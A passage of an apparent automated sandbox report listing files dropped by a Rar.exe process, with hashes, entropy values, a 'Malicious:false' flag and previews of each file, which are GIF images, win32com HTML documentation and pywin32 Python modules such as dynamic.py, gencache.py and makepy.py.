                                                                                                                                                                                      Preview:GIF89ap.q..........TTTrrr.................HH.vv..........O...nj.FA.0-....hei..D1,.ZN.iXS1'.E".K.0/..qNfM'H0..F.F.q&.I..H..JslKTN,....k..M..G..p...lh-65....ddS.......m............m..+........""...l...mm......O..0...HI.........Qp....O4D.BI/Nj...q..pR.."5.Kq/H.....#E.+p.g.R.G.-...+.-../..x.sE.3s.k.m.K.Ee.d...1./.i.............0m2.V.&./.6..E.+E.MjQ.#..m-4.Q..1.A)K.j3fN.....Y"'%.K...&......AFE.......u...b]......L..m..o..4...ML..........LK.`^eff...cssTood.....7LLU..App...m..C..N..#JJ5..$ttM...tt...P..-.........''.qq......L..4op...&..j............68.....-..n.......................P......`.h..i...Pp...n..........5b.Tr......n....58<.Ms0j.........FMb......gk.PV............PP.....rr........O2..h...[.......j.d.g.O....i......a................oLP)..!.......,....p.q.@...Y..H......*\....cy.81.&^.....q.!p )..Dr..V...T..P.b..........sR%M@)zb.HT,..h.\...P.J.J....%....W..$a..q.!..V...P..pcD......10...l.4i...Ev...]..$>...p....$..Y.:...0.L...y.._8.<|......}e
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:GIF image data, version 89a, 362 x 80
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5767
                                                                                                                                                                                      Entropy (8bit):7.345178911604584
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:WJEohZ4Peq7NUyUePpEeuynEoQ6l0ygrn5OBOhrdq4TkJKrVG:WvYeqhUyUePpAynEoQs+50SrnkJGVG
                                                                                                                                                                                      MD5:56EB975DA19AC3C45CB4B49F2712F6A8
                                                                                                                                                                                      SHA1:00783867B85B13069E976857C571249BF458A675
                                                                                                                                                                                      SHA-256:A4120DA0083D2E900596501E44CE6F1C780D71252D5A502DCBB6D8923327061A
                                                                                                                                                                                      SHA-512:5D03BDD3EA70FDDBF17515AB67D8555EC4F548B142AD6B0A6A48F0812F78ADB7F406C64147D97A85BD3587340379D360CF46DA8E7AFFB3DE055851289465A959
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:GIF89aj.P................... (((000888@@@HHHPPPXXX```hhhpppxxx.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!..... .,....j.P.@...C..H......*\....#J.H....3j...@.. C..(`A..(/R.9`C.0Qv..M..2 ......4...0.....@p.1....|F.P ..D>..k....T.@!B..8.|..#H.'.zx.2A.x...@t$......./H...f.P.....#S...H...f(......H...d....v.....o
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:GIF image data, version 89a, 40 x 40
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):275
                                                                                                                                                                                      Entropy (8bit):6.786005219619326
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:G0/tTJ8/U93q+sPV9XIzHvpHs4LxRQEGHOK:HcU93OnwTd6XOK
                                                                                                                                                                                      MD5:3FE9EA4E617AF99C099CD12C29C2AF09
                                                                                                                                                                                      SHA1:56C61258444E1765E97DFBF86DAF3D933CE6C241
                                                                                                                                                                                      SHA-256:4C9C3686EAAD40595DDBCD00861437F5EB66D484EC878720F3DEA1322D8FAF87
                                                                                                                                                                                      SHA-512:B423D4D36E448780A1897301C7E3D4E6B3EB9057B732748300B7666A267DDDB5EC7BF312B431EDECB4D471DE8E2917B160C78D763C13FD698F1FDC10B8443A4E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:GIF89a(.(............................!.......,....(.(........0.I..8.._@(..#.h..e../..0!.5.l4|....C..q5........t>.).RR....-.7....4..N.....M_..t.X.b..yyb.4xt.~*h...ow....f. ............n.qne...~....d.....B..}iY7w}...9*GQ...VXY. .QR/.L.I.+...5..].....9.-...%...............;
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1629
                                                                                                                                                                                      Entropy (8bit):5.422100882226218
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:FIPX2+wycBC/6MKdwkSoy6I2rbAsB8mKlVIOFjK:FOX2FycBC/6MmAJl2rbUzIsO
                                                                                                                                                                                      MD5:06E3AC587BA11A988172867D410EAACE
                                                                                                                                                                                      SHA1:F1D7453A477489A6A44912D0F722A7E52B3CF171
                                                                                                                                                                                      SHA-256:84BDCED6979959A42FF4E492E4515456282A5E619DD3B7B4CB86082D9BC87972
                                                                                                                                                                                      SHA-512:DE5AB002E106DDFB98E3B793F499DFC990C72F493752A8443D752C48816DC0A84D3FEE4E90D922A119885609D05D0793ADC729C773245548CAD7D7C6A175F933
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:<HTML>.<HEAD>.<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">.<META NAME="Generator" CONTENT="Microsoft Word 97">.<TITLE>win32com</TITLE>.<META NAME="Template" CONTENT="C:\Program Files\Microsoft Office\Office\html.dot">.</HEAD>.<BODY TEXT="#000000" LINK="#0000ff" VLINK="#0000ff">.<DIR>..<P> Enclose the entire page in UL, so bullets don't indent. --></P>.<H1><IMG SRC="image/pycom_blowing.gif" WIDTH=549 HEIGHT=99></H1>.<H2>Python and COM</H2>.<H3>Introduction</H3>.<P>Python has an excellent interface to COM (also known variously as OLE2, ActiveX, etc).</P>.<P>The Python COM package can be used to interface to almost any COM program (such as the MS-Office suite), write servers that can be hosted by any COM client (such as Visual Basic or C++), and has even been used to provide the core ActiveX Scripting Support. </P>...<UL>.<LI>Note that win32com is now released in the win32all installation package. The <A HREF="../win32all/win32all.exe">installation EXE ca
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:HTML document, Non-ISO extended-ASCII text, with very long lines (301)
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1164
                                                                                                                                                                                      Entropy (8bit):5.3901383302894965
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:FIxxlb2SRh1L+Co68YGAJU3fTtABGLTWjtQ9iQsboWP3spwyyLRwY06Fsims:FIPiCvGAJAA6WRacs48pwyyLRw36ers
                                                                                                                                                                                      MD5:C07F8018DCCEFB86169BA4C87A75E0D3
                                                                                                                                                                                      SHA1:21CD87EB1792B6E3179C4D5B3BB5A8EE877C0A72
                                                                                                                                                                                      SHA-256:1CB2278F301A053F742562959C5AF9DCEB8836130180CB19FA536E9128306DDB
                                                                                                                                                                                      SHA-512:68CDF0119C2FAE9220EFC45CD2C0BD2A3CBAAADDECB123247500EB62493AE13693063A45B638575E40FAB802B28CCA4827DC781805A00B9B8835B54F6B0DE751
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:<HTML>.<HEAD>.<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">.<META NAME="Generator" CONTENT="Microsoft Word 97">.<TITLE>Misc win32com Stuff</TITLE>.<META NAME="Version" CONTENT="8.0.3410">.<META NAME="Date" CONTENT="10/11/96">.<META NAME="Template" CONTENT="D:\Program Files\Microsoft Office\Office\HTML.DOT">.</HEAD>.<BODY TEXT="#000000" BGCOLOR="#ffffff">..<H1>Misc stuff I don.t know where to put anywhere else</H1>.<H4>Client Side Dispatch</H4>.<P>Using win32com.client.Dispatch automatically invokes all the win32com client side "smarts", including automatic usage of generated .py files etc.</P>.<P>If you wish to avoid that, and use truly "dynamic" objects (ie, there is generated .py support available, but you wish to avoid it), you can use win32com.client.dynamic.Dispatch</P>.<B><P>_print_details_() method</B><BR>.If win32com.client.dynamic.Dispatch is used, the objects have a _print_details_() method available, which prints all relevant knowledge about an o
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text, with LF, NEL line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3253
                                                                                                                                                                                      Entropy (8bit):5.260386145456912
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:FOfl5O+WSjhiHpufYhWH9+0n+uGzo+ymliTV2u:FE7xjhkpuNkft0hYG
                                                                                                                                                                                      MD5:7419E387B22EF6EFACD19177C929CD9D
                                                                                                                                                                                      SHA1:7EDF39A325362956E9D7ED1DAAC5762E52683344
                                                                                                                                                                                      SHA-256:32D4776316513F6881D9D4583D2323A285F950A7574864FF597AB3DC5C4E0F17
                                                                                                                                                                                      SHA-512:7EE74FFFE49868D3D704874EDE54A97FB582A388D60D5E4967B221094CC16470865C13D9461B238AEAA745309CA1E4922B850EFE68004DE106802B846A084031
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:<HTML>.<HEAD>.<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">.<META NAME="Generator" CONTENT="Microsoft Word 97">.<TITLE>The win32com package</TITLE>.<META NAME="Template" CONTENT="D:\Program Files\Microsoft Office\Office\html.dot">.</HEAD>.<BODY LINK="#0000ff" VLINK="#800080">..<H1><IMG SRC="image/pycom_blowing.gif" WIDTH=549 HEIGHT=99 ALT="Python and COM - Blowing the others away"></H1>.<H1>The win32com package </H1>.<FONT SIZE=2><P>This document describes the win32com package in general terms.</FONT> </P>.<FONT SIZE=2><P>The COM support can be thought of as existing in 2 main portions - the C++ support code (the core PythonCOM module), and helper code, implemented in Python. The total package is known as "win32com".</FONT> </P>.<FONT SIZE=2><P>The win32com support is stand-alone. It does not require Pythonwin.</FONT> </P>.<H2>The win32com package </H2>.<FONT SIZE=2><P>To facilitate an orderly framework, the Python "ni" module has been used, and the entire
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5874
                                                                                                                                                                                      Entropy (8bit):5.006870023723714
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:XAb1uKMlaFvYWuAMTzRmhId2FHRXsPWQ8yCH042yACUp/cor4cNKxK3m0+AeGQeF:Q3Fy50rRsPT4Y/ecUe9HTQe0Lkh/d
                                                                                                                                                                                      MD5:8D4BB296B8C8522D9CB068FB681E41AA
                                                                                                                                                                                      SHA1:D43461F8FCC2A4041FFC51F4945697354260B4F9
                                                                                                                                                                                      SHA-256:81B298E39090B915E0FD683BAA5BBEBD8087F0A522679327D860C4609A203819
                                                                                                                                                                                      SHA-512:7BF256A23AADFB185DA27EC66838109B328CE72828DCC5E8E834A1B8F81255CCD9F132430AEB3C21D5B9D660CBE42FAE742B214556233B6ECCCE0C2FCDB23A0B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:<HTML>.<HEAD>. <TITLE>win32com.client.VARIANT</TITLE>.</HEAD>.<BODY>..<H2>Introduction</H2>.<p>.win32com attempts to provide a seamless COM interface and hide many COM .implementation details, including the use of COM VARIANT structures. This .means that in most cases, you just call a COM object using normal Python .objects as parameters and get back normal Python objects as results..</p>..<p>.However, in some cases this doesn't work very well, particularly when using."dynamic" (aka late-bound) objects, or when using "makepy" (aka early-bound).objects which only declare a parameter is a VARIANT..</p>..<p>.The <code>win32com.client.VARIANT</code> object is designed to overcome these .problems..</p>..<h2>Drawbacks</h2>.The primary issue with this approach is that the programmer must learn more .about COM VARIANTs than otherwise - they need to know concepts such as .variants being <em>byref</em>, holding arrays, or that some may hold 32bit .unsigned integers while others hold 64bit si
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1757
                                                                                                                                                                                      Entropy (8bit):4.715819557466049
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:spQNKcrzGsTQc1a65NYPfdBnCHGc4/ymmhxL6m4A51QFCn4Aeu6:vZrzG6C6jYPfdgI/yFht6bKQFC4i6
                                                                                                                                                                                      MD5:6BB00B514891314ED73AA459426522D1
                                                                                                                                                                                      SHA1:7976F1ABD0D639E05AEAC24578C0A82F3B4C5388
                                                                                                                                                                                      SHA-256:7579776B08334DCD4A9E865230FA716598D77B88BAE456D9702D8FA634119B9D
                                                                                                                                                                                      SHA-512:7BC4B37A1BDBAFF1A7A15858982A0A60AE2E94B7B138208A59A6623567D39431D2E848D24CDD5E9CEAB3988BB5262674A71796F4BB947B861EB992C4797AF9C9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Manages a dictionary of CLSID strings to Python classes...Primary use of this module is to allow modules generated by.makepy.py to share classes. @makepy@ automatically generates code.which interacts with this module. You should never need to reference.this module directly...This module only provides support for modules which have been previously.been imported. The gencache module provides some support for loading modules.on demand - once done, this module supports it.....As an example, the MSACCESS.TLB type library makes reference to the.CLSID of the Database object, as defined in DAO3032.DLL. This.allows code using the MSAccess wrapper to natively use Databases...This obviously applies to all cooperating objects, not just DAO and.Access..""".mapCLSIDToClass = {}...def RegisterCLSID(clsid, pythonClass):. """Register a class that wraps a CLSID.. This function allows a CLSID to be globally associated with a class.. Certain module will automatically convert an IDispatch o
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):26331
                                                                                                                                                                                      Entropy (8bit):4.662613121389149
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:xDn8xR5SYxLvnNplhYf8glDkYcA3MRiboE:xr3KthIHDkYwiboE
                                                                                                                                                                                      MD5:70DE4541C80DFC6A27365BF8043D80AB
                                                                                                                                                                                      SHA1:7C4A70512C053FFA695B325FF5C9C12E0D71D41A
                                                                                                                                                                                      SHA-256:21035DE60FD401BC34A28ED96009C7AA04A0738620F9807C9796303F186D89B0
                                                                                                                                                                                      SHA-512:C94BFF9FB70D933E52B66B691770F0F2EECD9FBE42AFBC9B6345344A2137640C3E90B8E88A2C295DDF2FD088A8A56C1C6202A047F8B26BEF8AB118A6BF2C14FF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# This module exists to create the "best" dispatch object for a given.# object. If "makepy" support for a given object is detected, it is.# used, otherwise a dynamic dispatch object...# Note that if the unknown dispatch object then returns a known.# dispatch object, the known class will be used. This contrasts.# with dynamic.Dispatch behaviour, where dynamic objects are always used...import sys..import pythoncom.import pywintypes..from . import dynamic, gencache.._PyIDispatchType = pythoncom.TypeIIDs[pythoncom.IID_IDispatch]...def __WrapDispatch(. dispatch,. userName=None,. resultCLSID=None,. typeinfo=None,. UnicodeToString=None,. clsctx=pythoncom.CLSCTX_SERVER,. WrapperClass=None,.):. """. Helper function to return a makepy generated class for a CLSID if it exists,. otherwise cope by using CDispatch.. """. assert UnicodeToString is None, "this is deprecated and will go away". if resultCLSID is None:. try:. typeinfo = dispatch.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):29075
                                                                                                                                                                                      Entropy (8bit):4.503335395447579
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:zSxuBqXhGnnlZFDg6IZR6Y7ig6ijpDnBScm:zSxREn1VIf6Y7ig6i1jBScm
                                                                                                                                                                                      MD5:0AB057D2A7A2369EC9E19831CC4A1587
                                                                                                                                                                                      SHA1:E683D374922194F72DCC185BEC7DB0C26BBCA0FA
                                                                                                                                                                                      SHA-256:AC4866714136EDAB484F6C46FE8ED65D932CA7A9F045D5E3CA5C50054EF7E7D4
                                                                                                                                                                                      SHA-512:0F140282A96FDF2D10ECB44147CB00F687CF55759D27DB602D9DC65365695292ED5ECB29490A089F89A26D99A96E7B888E0E5CD463D9A9D4938435A7C0DD6398
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Contains knowledge to build a COM object definition...This module is used by both the @dynamic@ and @makepy@ modules to build.all knowledge of a COM object...This module contains classes which contain the actual knowledge of the object..This include parameter and return type information, the COM dispid and CLSID, etc...Other modules may use this information to generate .py files, use the information.dynamically, or possibly even generate .html documentation for objects.."""..#.# NOTES: DispatchItem and MapEntry used by dynamic.py..# the rest is used by makepy.py.#.# OleItem, DispatchItem, MapEntry, BuildCallList() is used by makepy..import datetime.import string.import sys.from keyword import iskeyword..import pythoncom.import winerror.from pywintypes import TimeType...# It isn't really clear what the quoting rules are in a C/IDL string and.# literals like a quote char and backslashes makes life a little painful to.# always render the string perfectly - so just punt an
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):20283
                                                                                                                                                                                      Entropy (8bit):4.650536842804007
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:IJzNvQMSutXh+PetXhsYQ4iyz086vDU45NT6jbXVS35shxdUIKyKaEwU63iAllEQ:cfXh+qXhs7pn6jL4psRbi108hDi
                                                                                                                                                                                      MD5:D636DB533FB28417CA5FCFA82852E4D0
                                                                                                                                                                                      SHA1:3A760E015522314A009EA46C35A5491553187077
                                                                                                                                                                                      SHA-256:5346BE9647031E54C09AD20E974E25B4859AA698BC2394F86C2884939FF52189
                                                                                                                                                                                      SHA-512:1EB83A93DA0958438CB591E9C2611E669ABEE72F0C910D528A0E646FD63C01192055E54F8C552C2924AE7CEA294648AFB5DAB5870C44335DB90B4A12D6DA784E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""A utility for browsing COM objects... Usage:.. Command Prompt.. Use the command *"python.exe combrowse.py"*. This will display. display a fairly small, modal dialog... Pythonwin.. Use the "Run Script" menu item, and this will create the browser in an. MDI window. This window can be fully resized... Details.. This module allows browsing of registered Type Libraries, COM categories,. and running COM objects. The display is similar to the Pythonwin object. browser, and displays the objects in a hierarchical window... Note that this module requires the win32ui (ie, Pythonwin) distribution to. work...""".import sys..import pythoncom.import win32api.import win32con.import win32ui.from pywin.tools import browser.from win32com.client import util...class HLIRoot(browser.HLIPythonObject):. def __init__(self, title):. super().__init__(name=title).. def GetSubList(self):. return [. HLIHeadingCategory(),. HLI_IEnumMoniker(.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1556
                                                                                                                                                                                      Entropy (8bit):4.386271235738792
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:JHextFm1Qb9j3JJ73fz5IQ4Xld8d55NlOCs4Dg:JextFHbR3J93f9yld8dbNlOCFg
                                                                                                                                                                                      MD5:8E0D0CE09D9692FA8C0D21F2731EA363
                                                                                                                                                                                      SHA1:323CF31B86CB7B914C4D1E535226EB4492DE823B
                                                                                                                                                                                      SHA-256:F5DE4E185C02120C7D007F8BBA3FF79C05FBE661155CDFF43E65805E52F82BB4
                                                                                                                                                                                      SHA-512:9485F97F637A270117E046998A8E9A48E171FB91E1B573190234235C7D8A88BA1A2F79E71528205CCFCD7160A5D5E92DA4E24282EDA9601C66BE3BB5DBFAB019
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Utilities for working with Connections""".import pythoncom.import win32com.server.util...class SimpleConnection:. "A simple, single connection object".. def __init__(self, coInstance=None, eventInstance=None, eventCLSID=None, debug=0):. self.cp = None. self.cookie = None. self.debug = debug. if not coInstance is None:. self.Connect(coInstance, eventInstance, eventCLSID).. def __del__(self):. try:. self.Disconnect(). except pythoncom.error:. # Ignore disconnection as we are torn down.. pass.. def _wrap(self, obj):. useDispatcher = None. if self.debug:. from win32com.server import dispatcher.. useDispatcher = dispatcher.DefaultDebugDispatcher. return win32com.server.util.wrap(obj, useDispatcher=useDispatcher).. def Connect(self, coInstance, eventInstance, eventCLSID=None):. try:. oleobj = coInstance._oleobj_. except At
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):28118
                                                                                                                                                                                      Entropy (8bit):4.504848551157066
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:6UPqrCv6OYlSK5gZ5iE0aqsd2FZjbeyJOmM:6UP+7lh4iKjY56
                                                                                                                                                                                      MD5:705FBE20E3B316291D0B873062F8B7EF
                                                                                                                                                                                      SHA1:11842E4C3753557B894E4FCE3E2BCB6C9D684559
                                                                                                                                                                                      SHA-256:1482C2802461E38DA4AD37169ACC6B73D8ECA9B343269ED73794C98DD72CE682
                                                                                                                                                                                      SHA-512:A7BD1CDA28A3D654A65CAC65C35F7E674304F2CA834F761C7B9C345ED69FAA80D6B4EE6FA496DB6AD1457C0EC1042E85368B009056E621AC72A35B204793A299
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Support for dynamic COM client support...Introduction. Dynamic COM client support is the ability to use a COM server without. prior knowledge of the server. This can be used to talk to almost all. COM servers, including much of MS Office... In general, you should not use this module directly - see below...Example. >>> import win32com.client. >>> xl = win32com.client.Dispatch("Excel.Application"). # The line above invokes the functionality of this class.. # xl is now an object we can use to talk to Excel.. >>> xl.Visible = 1 # The Excel window becomes visible...""".import traceback.import types..import pythoncom # Needed as code we eval() references it..import win32com.client.import winerror.from pywintypes import IIDType..from . import build..debugging = 0 # General debugging.debugging_attr = 0 # Debugging dynamic attribute lookups...LCID = 0x0..# These errors generally mean the property or method exists,.# but can't be used in this context - eg, property instead of a method, et
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):27995
                                                                                                                                                                                      Entropy (8bit):4.499790024046918
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:Ug3bsm2+Mv4JRa5jL8b0ND4/KzlRypOekv5w/Symo3h4V:UdmRJRa5jQTo32yqLmo3c
                                                                                                                                                                                      MD5:AB26D2324054631E766D1CD1F2B6A3E9
                                                                                                                                                                                      SHA1:E935A7BF217D050F1E60E386B60B69E18B7A9E0E
                                                                                                                                                                                      SHA-256:0588F8AD9E14AB84FCB6E1182483DF44363EAD486D4E9A3AB198603FE0D9B2B7
                                                                                                                                                                                      SHA-512:08E8CB6736FF8EF4C92FC360881CBA3E0ABF29EEE1213DAD7EC35A73C1F42600CB2559DF492354A60DABD02480AE3E7C76819BE518748F19479B804220864CA0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Manages the cache of generated Python code...Description. This file manages the cache of generated Python code. When run from the. command line, it also provides a number of options for managing that cache...Implementation. Each typelib is generated into a filename of format "{guid}x{lcid}x{major}x{minor}.py".. An external persistant dictionary maps from all known IIDs in all known type libraries. to the type library itself... Thus, whenever Python code knows the IID of an object, it can find the IID, LCID and version of. the type library which supports it. Given this information, it can find the Python module. with the support... If necessary, this support can be generated on the fly...Hacks, to do, etc. Currently just uses a pickled dictionary, but should used some sort of indexed file.. Maybe an OLE2 compound file, or a bsddb file?.""".import glob.import os.import sys.from importlib import reload..import pythoncom.import pywintypes.import win32com.import win32com.cli
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):56188
                                                                                                                                                                                      Entropy (8bit):4.320118098845648
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:YhPCfBkATLWxO4mkAk8fliyeMQZr3aC5wnKT3:CPZATL9kAkqliyeb3adni3
                                                                                                                                                                                      MD5:9F97DC21D09772797082D4F3C5967A53
                                                                                                                                                                                      SHA1:770E52F9575CFC0CC8E0528781A8DDD527B77A3E
                                                                                                                                                                                      SHA-256:06AC56208C85FDD7639A69D75E39365613AB36126B4E6456EE69CF78F38DC982
                                                                                                                                                                                      SHA-512:42D5A3E74C8860FC17B4B81E524A0DAE9012F9134788B7AA853B3F323A53D9D65F4434C102D3DC92D3D8BA662568C2FF3177BA8327E8F27FCA7308FA4D3DACC6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""genpy.py - The worker for makepy. See makepy.py for more details..This code was moved simply to speed Python in normal circumstances. As the makepy.py.is normally run from the command line, it reparses the code each time. Now makepy.is nothing more than the command line handler and public interface...The makepy command line etc handling is also getting large enough in its own right!."""..# NOTE - now supports a "demand" mechanism - the top-level is a package, and.# each class etc can be made individually..# This should eventually become the default..# Then the old non-package technique should be removed..# There should be no b/w compat issues, and will just help clean the code..# This will be done once the new "demand" mechanism gets a good workout..import os.import sys.import time..import pythoncom.import win32com..from . import build..error = "makepy.error".makepy_version = "0.5.01" # Written to generated file...GEN_FULL = "full".GEN_DEMAND_BASE = "demand(base)".GEN_DEMAND_CHI
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):14916
                                                                                                                                                                                      Entropy (8bit):4.427768304708846
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:GBeBZEoC2NjxKCFYKWi1bY5ydcAA6cO6chZ+7PM8HrpHCqefFRw0/gQM40da9S3:qIZEN2NjxDJ1RLA6j6qk7PMt70duo
                                                                                                                                                                                      MD5:F7E799C6EAA5CAB3336AB136AF4E25D7
                                                                                                                                                                                      SHA1:CC4B89EFC334E3D6CCB9FBFB6F4FED369DDCCA42
                                                                                                                                                                                      SHA-256:BDE72A1C6118DD98094BDB8966A7C76F6019FBFBF81F068CA06AC4428D86AFF9
                                                                                                                                                                                      SHA-512:F5301AD7048CBEB267BC33533BEDB2577923150788E5D229D67E7FD79E7C49DC65C67A728B7EA39C74E777A93BD51D5931412A1DFADBF764691C48D5B30103C2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Originally written by Curt Hagenlocher, and various bits.# and pieces by Mark Hammond (and now Greg Stein has had.# a go too :-)..# Note that the main worker code has been moved to genpy.py.# As this is normally run from the command line, it reparses the code each time..# Now this is nothing more than the command line handler and public interface...# XXX - TO DO.# XXX - Greg and Mark have some ideas for a revamp - just no.# time - if you want to help, contact us for details..# Main idea is to drop the classes exported and move to a more.# traditional data driven model..."""Generate a .py file from an OLE TypeLibrary file.... This module is concerned only with the actual writing of. a .py file. It draws on the @build@ module, which builds. the knowledge of a COM interface...""".usageHelp = """ \..Usage:.. makepy.py [-i] [-v|q] [-h] [-u] [-o output_file] [-d] [typelib, ...].. -i -- Show information for the specified typelib... -v -- Verbose output... -q
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6316
                                                                                                                                                                                      Entropy (8bit):4.369023441818291
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:ABpBQDukn7UHv67dMegMbF0ewnXPN8MuAKIWbVpqBY7gPSZRZaXRM/1zwlBvaUND:AjkIHq5QNpsIWbVoY8PqwnvaUND
                                                                                                                                                                                      MD5:8483D39CDA09E51B898036763A7D4FE2
                                                                                                                                                                                      SHA1:993EB217EBC1D13832B69E029CAAF6257EE6DA56
